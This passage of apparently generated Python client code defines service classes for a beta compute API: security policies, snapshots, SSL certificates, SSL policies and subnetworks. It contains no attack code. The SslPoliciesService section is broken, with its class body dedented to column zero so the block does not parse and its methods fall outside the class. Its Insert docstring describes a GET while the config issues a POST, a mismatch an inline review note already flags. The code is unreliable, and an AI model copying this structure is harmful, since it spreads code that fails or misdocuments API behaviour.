      path_params=[u'project', u'securityPolicy'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/securityPolicies/{securityPolicy}',
      request_field='',
      request_type_name=u'ComputeSecurityPoliciesDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """List all of the ordered rules present in a single specified policy.

    Args:
      request: (ComputeSecurityPoliciesGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (SecurityPolicy) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.securityPolicies.get',
      ordered_params=[u'project', u'securityPolicy'],
      path_params=[u'project', u'securityPolicy'],
      query_params=[],
      relative_path=u'projects/{project}/global/securityPolicies/{securityPolicy}',
      request_field='',
      request_type_name=u'ComputeSecurityPoliciesGetRequest',
      response_type_name=u'SecurityPolicy',
      supports_download=False,
  )

  def GetRule(self, request, global_params=None):
    """Gets a rule at the specified priority.

    Args:
      request: (ComputeSecurityPoliciesGetRuleRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (SecurityPolicyRule) The response message.
    """
    config = self.GetMethodConfig('GetRule')
    return self._RunMethod(
        config, request, global_params=global_params)

  GetRule.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.securityPolicies.getRule',
      ordered_params=[u'project', u'securityPolicy'],
      path_params=[u'project', u'securityPolicy'],
      query_params=[u'priority'],
      relative_path=u'projects/{project}/global/securityPolicies/{securityPolicy}/getRule',
      request_field='',
      request_type_name=u'ComputeSecurityPoliciesGetRuleRequest',
      response_type_name=u'SecurityPolicyRule',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Creates a new policy in the specified project using the data included in the request.

    Args:
      request: (ComputeSecurityPoliciesInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Insert')
    return self._RunMethod(
        config, request, global_params=global_params)

  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.securityPolicies.insert',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/securityPolicies',
      request_field=u'securityPolicy',
      request_type_name=u'ComputeSecurityPoliciesInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """List all the policies that have been configured for the specified project.

    Args:
      request: (ComputeSecurityPoliciesListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (SecurityPolicyList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.securityPolicies.list',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/global/securityPolicies',
      request_field='',
      request_type_name=u'ComputeSecurityPoliciesListRequest',
      response_type_name=u'SecurityPolicyList',
      supports_download=False,
  )

  def Patch(self, request, global_params=None):
    """Patches the specified policy with the data included in the request.

    Args:
      request: (ComputeSecurityPoliciesPatchRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Patch')
    return self._RunMethod(
        config, request, global_params=global_params)

  Patch.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'PATCH',
      method_id=u'compute.securityPolicies.patch',
      ordered_params=[u'project', u'securityPolicy'],
      path_params=[u'project', u'securityPolicy'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/securityPolicies/{securityPolicy}',
      request_field=u'securityPolicyResource',
      request_type_name=u'ComputeSecurityPoliciesPatchRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def PatchRule(self, request, global_params=None):
    """Patches a rule at the specified priority.

    Args:
      request: (ComputeSecurityPoliciesPatchRuleRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('PatchRule')
    return self._RunMethod(
        config, request, global_params=global_params)

  PatchRule.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.securityPolicies.patchRule',
      ordered_params=[u'project', u'securityPolicy'],
      path_params=[u'project', u'securityPolicy'],
      query_params=[u'priority'],
      relative_path=u'projects/{project}/global/securityPolicies/{securityPolicy}/patchRule',
      request_field=u'securityPolicyRule',
      request_type_name=u'ComputeSecurityPoliciesPatchRuleRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def RemoveRule(self, request, global_params=None):
    """Deletes a rule at the specified priority.

    Args:
      request: (ComputeSecurityPoliciesRemoveRuleRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('RemoveRule')
    return self._RunMethod(
        config, request, global_params=global_params)

  RemoveRule.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.securityPolicies.removeRule',
      ordered_params=[u'project', u'securityPolicy'],
      path_params=[u'project', u'securityPolicy'],
      query_params=[u'priority'],
      relative_path=u'projects/{project}/global/securityPolicies/{securityPolicy}/removeRule',
      request_field='',
      request_type_name=u'ComputeSecurityPoliciesRemoveRuleRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def TestIamPermissions(self, request, global_params=None):
    """Returns permissions that a caller has on the specified resource.

    Args:
      request: (ComputeSecurityPoliciesTestIamPermissionsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (TestPermissionsResponse) The response message.
    """
    config = self.GetMethodConfig('TestIamPermissions')
    return self._RunMethod(
        config, request, global_params=global_params)

  TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.securityPolicies.testIamPermissions',
      ordered_params=[u'project', u'resource'],
      path_params=[u'project', u'resource'],
      query_params=[],
      relative_path=u'projects/{project}/global/securityPolicies/{resource}/testIamPermissions',
      request_field=u'testPermissionsRequest',
      request_type_name=u'ComputeSecurityPoliciesTestIamPermissionsRequest',
      response_type_name=u'TestPermissionsResponse',
      supports_download=False,
  )
class SnapshotsService(base_api.BaseApiService):
  """Service class for the snapshots resource.

  Each public method resolves its ApiMethodInfo via GetMethodConfig and
  delegates the HTTP call to the inherited _RunMethod helper.
  """

  # Resource collection name.
  _NAME = u'snapshots'

  def __init__(self, client):
    super(ComputeBeta.SnapshotsService, self).__init__(client)
    # No media-upload configurations are defined for this collection.
    self._upload_configs = {
        }

  def Delete(self, request, global_params=None):
    """Deletes the specified Snapshot resource. Keep in mind that deleting a single snapshot might not necessarily delete all the data on that snapshot. If any data on the snapshot that is marked for deletion is needed for subsequent snapshots, the data will be moved to the next corresponding snapshot.

    For more information, see Deleting snapshots.

    Args:
      request: (ComputeSnapshotsDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Delete')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Each <Method>.method_config below is wrapped in a lambda so that the
  # ApiMethodInfo is constructed only when it is requested.
  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.snapshots.delete',
      ordered_params=[u'project', u'snapshot'],
      path_params=[u'project', u'snapshot'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/snapshots/{snapshot}',
      request_field='',
      request_type_name=u'ComputeSnapshotsDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns the specified Snapshot resource. Get a list of available snapshots by making a list() request.

    Args:
      request: (ComputeSnapshotsGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Snapshot) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.snapshots.get',
      ordered_params=[u'project', u'snapshot'],
      path_params=[u'project', u'snapshot'],
      query_params=[],
      relative_path=u'projects/{project}/global/snapshots/{snapshot}',
      request_field='',
      request_type_name=u'ComputeSnapshotsGetRequest',
      response_type_name=u'Snapshot',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves the list of Snapshot resources contained within the specified project.

    Args:
      request: (ComputeSnapshotsListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (SnapshotList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.snapshots.list',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/global/snapshots',
      request_field='',
      request_type_name=u'ComputeSnapshotsListRequest',
      response_type_name=u'SnapshotList',
      supports_download=False,
  )

  def SetLabels(self, request, global_params=None):
    """Sets the labels on a snapshot. To learn more about labels, read the Labeling Resources documentation.

    Args:
      request: (ComputeSnapshotsSetLabelsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('SetLabels')
    return self._RunMethod(
        config, request, global_params=global_params)

  SetLabels.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.snapshots.setLabels',
      ordered_params=[u'project', u'resource'],
      path_params=[u'project', u'resource'],
      query_params=[],
      relative_path=u'projects/{project}/global/snapshots/{resource}/setLabels',
      request_field=u'globalSetLabelsRequest',
      request_type_name=u'ComputeSnapshotsSetLabelsRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def TestIamPermissions(self, request, global_params=None):
    """Returns permissions that a caller has on the specified resource.

    Args:
      request: (ComputeSnapshotsTestIamPermissionsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (TestPermissionsResponse) The response message.
    """
    config = self.GetMethodConfig('TestIamPermissions')
    return self._RunMethod(
        config, request, global_params=global_params)

  TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.snapshots.testIamPermissions',
      ordered_params=[u'project', u'resource'],
      path_params=[u'project', u'resource'],
      query_params=[],
      relative_path=u'projects/{project}/global/snapshots/{resource}/testIamPermissions',
      request_field=u'testPermissionsRequest',
      request_type_name=u'ComputeSnapshotsTestIamPermissionsRequest',
      response_type_name=u'TestPermissionsResponse',
      supports_download=False,
  )
class SslCertificatesService(base_api.BaseApiService):
  """Service class for the sslCertificates resource.

  Each public method resolves its ApiMethodInfo via GetMethodConfig and
  delegates the HTTP call to the inherited _RunMethod helper.
  """

  # Resource collection name.
  _NAME = u'sslCertificates'

  def __init__(self, client):
    super(ComputeBeta.SslCertificatesService, self).__init__(client)
    # No media-upload configurations are defined for this collection.
    self._upload_configs = {
        }

  def Delete(self, request, global_params=None):
    """Deletes the specified SslCertificate resource.

    Args:
      request: (ComputeSslCertificatesDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Delete')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Each <Method>.method_config below is wrapped in a lambda so that the
  # ApiMethodInfo is constructed only when it is requested.
  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.sslCertificates.delete',
      ordered_params=[u'project', u'sslCertificate'],
      path_params=[u'project', u'sslCertificate'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/sslCertificates/{sslCertificate}',
      request_field='',
      request_type_name=u'ComputeSslCertificatesDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns the specified SslCertificate resource. Get a list of available SSL certificates by making a list() request.

    Args:
      request: (ComputeSslCertificatesGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (SslCertificate) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.sslCertificates.get',
      ordered_params=[u'project', u'sslCertificate'],
      path_params=[u'project', u'sslCertificate'],
      query_params=[],
      relative_path=u'projects/{project}/global/sslCertificates/{sslCertificate}',
      request_field='',
      request_type_name=u'ComputeSslCertificatesGetRequest',
      response_type_name=u'SslCertificate',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Creates a SslCertificate resource in the specified project using the data included in the request.

    Args:
      request: (ComputeSslCertificatesInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Insert')
    return self._RunMethod(
        config, request, global_params=global_params)

  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.sslCertificates.insert',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/sslCertificates',
      request_field=u'sslCertificate',
      request_type_name=u'ComputeSslCertificatesInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves the list of SslCertificate resources available to the specified project.

    Args:
      request: (ComputeSslCertificatesListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (SslCertificateList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.sslCertificates.list',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/global/sslCertificates',
      request_field='',
      request_type_name=u'ComputeSslCertificatesListRequest',
      response_type_name=u'SslCertificateList',
      supports_download=False,
  )

  def TestIamPermissions(self, request, global_params=None):
    """Returns permissions that a caller has on the specified resource.

    Args:
      request: (ComputeSslCertificatesTestIamPermissionsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (TestPermissionsResponse) The response message.
    """
    config = self.GetMethodConfig('TestIamPermissions')
    return self._RunMethod(
        config, request, global_params=global_params)

  TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.sslCertificates.testIamPermissions',
      ordered_params=[u'project', u'resource'],
      path_params=[u'project', u'resource'],
      query_params=[],
      relative_path=u'projects/{project}/global/sslCertificates/{resource}/testIamPermissions',
      request_field=u'testPermissionsRequest',
      request_type_name=u'ComputeSslCertificatesTestIamPermissionsRequest',
      response_type_name=u'TestPermissionsResponse',
      supports_download=False,
  )
class SslPoliciesService(base_api.BaseApiService):
"""Service class for the sslPolicies resource."""
_NAME = u'sslPolicies'
def __init__(self, client):
  # Python-2-compatible explicit super() call into BaseApiService.
  super(ComputeBeta.SslPoliciesService, self).__init__(client)
  # No media-upload configurations are defined for this collection.
  self._upload_configs = {
      }
def Delete(self, request, global_params=None):
  """Deletes the specified SSL policy. The SSL policy resource can be deleted only if it is not in use by any TargetHttpsProxy or TargetSslProxy resources.

  Args:
    request: (ComputeSslPoliciesDeleteRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve this method's wire configuration, then delegate the actual
  # HTTP round trip to the shared base-service machinery.
  method_config = self.GetMethodConfig('Delete')
  return self._RunMethod(method_config, request,
                         global_params=global_params)

# Wire-level description of compute.sslPolicies.delete; the lambda defers
# construction of the ApiMethodInfo until it is requested.
Delete.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.sslPolicies.delete',
    http_method=u'DELETE',
    ordered_params=[u'project', u'sslPolicy'],
    path_params=[u'project', u'sslPolicy'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/global/sslPolicies/{sslPolicy}',
    request_field='',
    request_type_name=u'ComputeSslPoliciesDeleteRequest',
    response_type_name=u'Operation',
    supports_download=False)
def Get(self, request, global_params=None):
  """Lists all of the ordered rules present in a single specified policy.

  Args:
    request: (ComputeSslPoliciesGetRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (SslPolicy) The response message.
  """
  # Resolve this method's wire configuration, then delegate the actual
  # HTTP round trip to the shared base-service machinery.
  method_config = self.GetMethodConfig('Get')
  return self._RunMethod(method_config, request,
                         global_params=global_params)

# Wire-level description of compute.sslPolicies.get; the lambda defers
# construction of the ApiMethodInfo until it is requested.
Get.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.sslPolicies.get',
    http_method=u'GET',
    ordered_params=[u'project', u'sslPolicy'],
    path_params=[u'project', u'sslPolicy'],
    query_params=[],
    relative_path=u'projects/{project}/global/sslPolicies/{sslPolicy}',
    request_field='',
    request_type_name=u'ComputeSslPoliciesGetRequest',
    response_type_name=u'SslPolicy',
    supports_download=False)
def Insert(self, request, global_params=None):
  """Returns the specified SSL policy resource. Get a list of available SSL policies by making a list() request.

  NOTE(review): the summary above (carried over from the upstream API
  description) reads like a GET, but the wire config below issues a POST
  that creates an SSL policy — confirm against the discovery document.

  Args:
    request: (ComputeSslPoliciesInsertRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve this method's wire configuration, then delegate the actual
  # HTTP round trip to the shared base-service machinery.
  method_config = self.GetMethodConfig('Insert')
  return self._RunMethod(method_config, request,
                         global_params=global_params)

# Wire-level description of compute.sslPolicies.insert; the lambda defers
# construction of the ApiMethodInfo until it is requested.
Insert.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.sslPolicies.insert',
    http_method=u'POST',
    ordered_params=[u'project'],
    path_params=[u'project'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/global/sslPolicies',
    request_field=u'sslPolicy',
    request_type_name=u'ComputeSslPoliciesInsertRequest',
    response_type_name=u'Operation',
    supports_download=False)
def List(self, request, global_params=None):
  """Lists all the SSL policies that have been configured for the specified project.

  Args:
    request: (ComputeSslPoliciesListRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (SslPoliciesList) The response message.
  """
  # Resolve this method's wire configuration, then delegate the actual
  # HTTP round trip to the shared base-service machinery.
  method_config = self.GetMethodConfig('List')
  return self._RunMethod(method_config, request,
                         global_params=global_params)

# Wire-level description of compute.sslPolicies.list; the lambda defers
# construction of the ApiMethodInfo until it is requested.
List.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.sslPolicies.list',
    http_method=u'GET',
    ordered_params=[u'project'],
    path_params=[u'project'],
    query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
    relative_path=u'projects/{project}/global/sslPolicies',
    request_field='',
    request_type_name=u'ComputeSslPoliciesListRequest',
    response_type_name=u'SslPoliciesList',
    supports_download=False)
def ListAvailableFeatures(self, request, global_params=None):
  """Lists every feature that a custom-profile SSL policy may specify.

  Args:
    request: (ComputeSslPoliciesListAvailableFeaturesRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments
  Returns:
    (SslPoliciesListAvailableFeaturesResponse) The response message.
  """
  # Delegate to the base class: look up this method's config and execute it.
  method_info = self.GetMethodConfig('ListAvailableFeatures')
  return self._RunMethod(method_info, request,
                         global_params=global_params)

ListAvailableFeatures.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.sslPolicies.listAvailableFeatures',
    http_method=u'GET',
    relative_path=u'projects/{project}/global/sslPolicies/listAvailableFeatures',
    ordered_params=[u'project'],
    path_params=[u'project'],
    query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
    request_field='',
    request_type_name=u'ComputeSslPoliciesListAvailableFeaturesRequest',
    response_type_name=u'SslPoliciesListAvailableFeaturesResponse',
    supports_download=False,
)
def Patch(self, request, global_params=None):
  """Patches the given SSL policy with the data carried in the request.

  Args:
    request: (ComputeSslPoliciesPatchRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments
  Returns:
    (Operation) The response message.
  """
  # The base service performs the HTTP PATCH described by the method config.
  method_info = self.GetMethodConfig('Patch')
  return self._RunMethod(method_info, request,
                         global_params=global_params)

Patch.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.sslPolicies.patch',
    http_method=u'PATCH',
    relative_path=u'projects/{project}/global/sslPolicies/{sslPolicy}',
    ordered_params=[u'project', u'sslPolicy'],
    path_params=[u'project', u'sslPolicy'],
    query_params=[u'requestId'],
    request_field=u'sslPolicyResource',
    request_type_name=u'ComputeSslPoliciesPatchRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
  """Reports which of the requested permissions the caller holds on the resource.

  Args:
    request: (ComputeSslPoliciesTestIamPermissionsRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments
  Returns:
    (TestPermissionsResponse) The response message.
  """
  # Fetch the declarative RPC description and run it via the base service.
  method_info = self.GetMethodConfig('TestIamPermissions')
  return self._RunMethod(method_info, request,
                         global_params=global_params)

TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.sslPolicies.testIamPermissions',
    http_method=u'POST',
    relative_path=u'projects/{project}/global/sslPolicies/{resource}/testIamPermissions',
    ordered_params=[u'project', u'resource'],
    path_params=[u'project', u'resource'],
    query_params=[],
    request_field=u'testPermissionsRequest',
    request_type_name=u'ComputeSslPoliciesTestIamPermissionsRequest',
    response_type_name=u'TestPermissionsResponse',
    supports_download=False,
)
class SubnetworksService(base_api.BaseApiService):
  """Service class for the subnetworks resource.

  Generated API client code (apitools): each public method looks up its
  declarative ApiMethodInfo via GetMethodConfig and delegates the actual
  HTTP round-trip to the base class's _RunMethod.
  """

  _NAME = u'subnetworks'

  def __init__(self, client):
    super(ComputeBeta.SubnetworksService, self).__init__(client)
    # No media-upload configurations for this service.
    self._upload_configs = {
        }

  def AggregatedList(self, request, global_params=None):
    """Retrieves an aggregated list of subnetworks.

    Args:
      request: (ComputeSubnetworksAggregatedListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (SubnetworkAggregatedList) The response message.
    """
    config = self.GetMethodConfig('AggregatedList')
    return self._RunMethod(
        config, request, global_params=global_params)

  AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.subnetworks.aggregatedList',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/aggregated/subnetworks',
      request_field='',
      request_type_name=u'ComputeSubnetworksAggregatedListRequest',
      response_type_name=u'SubnetworkAggregatedList',
      supports_download=False,
  )

  def Delete(self, request, global_params=None):
    """Deletes the specified subnetwork.

    Args:
      request: (ComputeSubnetworksDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Delete')
    return self._RunMethod(
        config, request, global_params=global_params)

  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.subnetworks.delete',
      ordered_params=[u'project', u'region', u'subnetwork'],
      path_params=[u'project', u'region', u'subnetwork'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/regions/{region}/subnetworks/{subnetwork}',
      request_field='',
      request_type_name=u'ComputeSubnetworksDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def ExpandIpCidrRange(self, request, global_params=None):
    """Expands the IP CIDR range of the subnetwork to a specified value.

    Args:
      request: (ComputeSubnetworksExpandIpCidrRangeRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('ExpandIpCidrRange')
    return self._RunMethod(
        config, request, global_params=global_params)

  ExpandIpCidrRange.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.subnetworks.expandIpCidrRange',
      ordered_params=[u'project', u'region', u'subnetwork'],
      path_params=[u'project', u'region', u'subnetwork'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/regions/{region}/subnetworks/{subnetwork}/expandIpCidrRange',
      request_field=u'subnetworksExpandIpCidrRangeRequest',
      request_type_name=u'ComputeSubnetworksExpandIpCidrRangeRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns the specified subnetwork. Get a list of available subnetworks by making a list() request.

    Args:
      request: (ComputeSubnetworksGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Subnetwork) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.subnetworks.get',
      ordered_params=[u'project', u'region', u'subnetwork'],
      path_params=[u'project', u'region', u'subnetwork'],
      query_params=[],
      relative_path=u'projects/{project}/regions/{region}/subnetworks/{subnetwork}',
      request_field='',
      request_type_name=u'ComputeSubnetworksGetRequest',
      response_type_name=u'Subnetwork',
      supports_download=False,
  )

  def GetIamPolicy(self, request, global_params=None):
    """Gets the access control policy for a resource. May be empty if no such policy or resource exists.

    Args:
      request: (ComputeSubnetworksGetIamPolicyRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Policy) The response message.
    """
    config = self.GetMethodConfig('GetIamPolicy')
    return self._RunMethod(
        config, request, global_params=global_params)

  GetIamPolicy.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.subnetworks.getIamPolicy',
      ordered_params=[u'project', u'region', u'resource'],
      path_params=[u'project', u'region', u'resource'],
      query_params=[],
      relative_path=u'projects/{project}/regions/{region}/subnetworks/{resource}/getIamPolicy',
      request_field='',
      request_type_name=u'ComputeSubnetworksGetIamPolicyRequest',
      response_type_name=u'Policy',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Creates a subnetwork in the specified project using the data included in the request.

    Args:
      request: (ComputeSubnetworksInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Insert')
    return self._RunMethod(
        config, request, global_params=global_params)

  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.subnetworks.insert',
      ordered_params=[u'project', u'region'],
      path_params=[u'project', u'region'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/regions/{region}/subnetworks',
      request_field=u'subnetwork',
      request_type_name=u'ComputeSubnetworksInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves a list of subnetworks available to the specified project.

    Args:
      request: (ComputeSubnetworksListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (SubnetworkList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.subnetworks.list',
      ordered_params=[u'project', u'region'],
      path_params=[u'project', u'region'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/regions/{region}/subnetworks',
      request_field='',
      request_type_name=u'ComputeSubnetworksListRequest',
      response_type_name=u'SubnetworkList',
      supports_download=False,
  )

  def ListUsable(self, request, global_params=None):
    """Retrieves an aggregated list of usable subnetworks.

    Args:
      request: (ComputeSubnetworksListUsableRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (UsableSubnetworksAggregatedList) The response message.
    """
    config = self.GetMethodConfig('ListUsable')
    return self._RunMethod(
        config, request, global_params=global_params)

  ListUsable.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.subnetworks.listUsable',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/aggregated/subnetworks/listUsable',
      request_field='',
      request_type_name=u'ComputeSubnetworksListUsableRequest',
      response_type_name=u'UsableSubnetworksAggregatedList',
      supports_download=False,
  )

  def Patch(self, request, global_params=None):
    """Patches the specified subnetwork with the data included in the request. Only the following fields within the subnetwork resource can be specified in the request: secondary_ip_range, allow_subnet_cidr_routes_overlap and role. It is also mandatory to specify the current fingeprint of the subnetwork resource being patched.

    Args:
      request: (ComputeSubnetworksPatchRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Patch')
    return self._RunMethod(
        config, request, global_params=global_params)

  Patch.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'PATCH',
      method_id=u'compute.subnetworks.patch',
      ordered_params=[u'project', u'region', u'subnetwork'],
      path_params=[u'project', u'region', u'subnetwork'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/regions/{region}/subnetworks/{subnetwork}',
      request_field=u'subnetworkResource',
      request_type_name=u'ComputeSubnetworksPatchRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def SetIamPolicy(self, request, global_params=None):
    """Sets the access control policy on the specified resource. Replaces any existing policy.

    Args:
      request: (ComputeSubnetworksSetIamPolicyRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Policy) The response message.
    """
    config = self.GetMethodConfig('SetIamPolicy')
    return self._RunMethod(
